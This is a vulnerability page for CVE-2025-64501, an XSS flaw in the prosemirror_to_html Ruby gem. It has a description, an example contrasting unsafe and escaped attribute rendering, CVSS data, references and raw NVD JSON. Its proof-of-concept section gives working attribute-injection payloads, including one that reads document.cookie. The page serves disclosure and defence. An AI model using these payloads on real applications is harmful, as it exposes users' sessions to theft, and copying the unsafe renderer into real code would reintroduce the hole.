Security Vulnerability Report
CVE-2025-64501 CVSS 7.6 HIGH

CVE-2025-64501

Published: 2025-11-10 22:15:38
Last Modified: 2026-04-15 00:35:42

Description

ProsemirrorToHtml is a JSON converter which takes ProseMirror-compatible JSON and outputs HTML. In versions 0.2.0 and below, the `prosemirror_to_html` gem is vulnerable to Cross-Site Scripting (XSS) attacks through malicious HTML attribute values. While tag content is properly escaped, attribute values are not, allowing attackers to inject arbitrary JavaScript code. Applications that use `prosemirror_to_html` to convert ProseMirror documents to HTML, user-generated ProseMirror content, and end users viewing the rendered HTML output are all at risk of attack. This issue is fixed in version 0.2.1.
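The description above pins the defect to one asymmetry: text content is HTML-escaped, attribute values are not. The Ruby below is an added illustration written for this page, not the gem's code; the renderer functions, the attribute-name pattern and the sample node are all constructed. It renders one ProseMirror paragraph node with an attribute rendering routine that interpolates values raw, then with one that escapes values the same way as text, and includes a small regression check that counts attribute boundaries in the output so a renderer test can catch the quote-breaking case.

```ruby
# Added example (not the prosemirror_to_html gem's code): rendering HTML
# attributes from a ProseMirror node's "attrs" with and without escaping.
# All names below are hypothetical.
require 'cgi'

# Constructed node: the attribute value contains a double quote that, if
# emitted verbatim, closes the attribute and lets a second one follow it.
SAMPLE_NODE = {
  type: 'paragraph',
  attrs: { 'class' => 'note" onmouseover="alert(1)' },
  content: [{ type: 'text', text: '<b>escaped text</b>' }]
}.freeze

# Unsafe: only the text content goes through CGI.escapeHTML; attribute
# values are interpolated raw (the shape of the bug described above).
def render_paragraph_unsafe(node)
  attrs = node[:attrs].map { |k, v| %(#{k}="#{v}") }.join(' ')
  text = node[:content].map { |c| CGI.escapeHTML(c[:text]) }.join
  "<p #{attrs}>#{text}</p>"
end

# Attribute names come from the document too, so restrict them to a
# conservative character set rather than trusting them.
ATTR_NAME = /\A[A-Za-z][A-Za-z0-9_:-]*\z/.freeze

# Safe: names are validated and values are escaped like text content, so a
# quote inside a value becomes &quot; and cannot terminate the attribute.
def render_paragraph_safe(node)
  attrs = node[:attrs].map do |k, v|
    raise ArgumentError, "bad attribute name: #{k.inspect}" unless k.to_s.match?(ATTR_NAME)
    %(#{k}="#{CGI.escapeHTML(v.to_s)}")
  end.join(' ')
  text = node[:content].map { |c| CGI.escapeHTML(c[:text]) }.join
  "<p #{attrs}>#{text}</p>"
end

# Regression check for a renderer's test suite: count attribute boundaries
# (name followed by ="). A node with one attribute must render exactly one.
def attribute_count(html)
  html.scan(/\s[A-Za-z][A-Za-z0-9_:-]*="/).size
end

if __FILE__ == $PROGRAM_NAME
  puts render_paragraph_unsafe(SAMPLE_NODE)
  puts render_paragraph_safe(SAMPLE_NODE)
end
```

The escaping itself is one call; the point is that it must be applied to every attribute value, not only to text nodes, and that attribute names coming from a document deserve validation of their own.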

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

prosemirror_to_html gem <= 0.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
ruby
# ProsemirrorToHtml XSS PoC - CVE-2025-64501
# This PoC demonstrates how malicious attribute values can inject JavaScript
require 'prosemirror_to_html'

# Malicious ProseMirror JSON with XSS payload in attribute value
malicious_doc = {
  type: 'doc',
  content: [
    {
      type: 'paragraph',
      attrs: {
        # XSS payload in custom attribute - triggers onerror handler
        # (%q quoting keeps the mixed single and double quotes in the payload intact)
        'data-src' => %q(xss' onerror='alert("XSS by prosemirror_to_html CVE-2025-64501")' b=')
      },
      content: [
        { type: 'text', text: 'Normal paragraph text' }
      ]
    }
  ]
}

# Another PoC variant using event handler in attribute
malicious_doc2 = {
  type: 'doc',
  content: [
    {
      type: 'heading',
      attrs: {
        # Embedding JavaScript event handler
        'class' => '" onmouseover="alert(document.cookie)"'
      },
      content: [
        { type: 'text', text: 'XSS via attribute injection' }
      ]
    }
  ]
}

# Convert to HTML - vulnerable version will output unsanitized attributes
html_output = ProseMirrorToHtml::HtmlRenderer.new.render(malicious_doc)
puts "Generated HTML (vulnerable):"
puts html_output
# The output will contain the unescaped JavaScript code that browsers will execute

References

https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8
https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64501", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:37.683", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProsemirrorToHtml is a JSON converter which takes ProseMirror-compatible JSON and outputs HTML. In versions 0.2.0 and below, the `prosemirror_to_html` gem is vulnerable to Cross-Site Scripting (XSS) attacks through malicious HTML attribute values. While tag content is properly escaped, attribute values are not, allowing attackers to inject arbitrary JavaScript code. Applications that use `prosemirror_to_html` to convert ProseMirror documents to HTML, user-generated ProseMirror content, and end users viewing the rendered HTML output are all at risk of attack. This issue is fixed in version 0.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/etaminstudio/prosemirror_to_html/commit/4d59f94f550bcabeec30d298791bbdd883298ad8", "source": "[email protected]"}, {"url": "https://github.com/etaminstudio/prosemirror_to_html/security/advisories/GHSA-52c5-vh7f-26fx", "source": "[email protected]"}]}}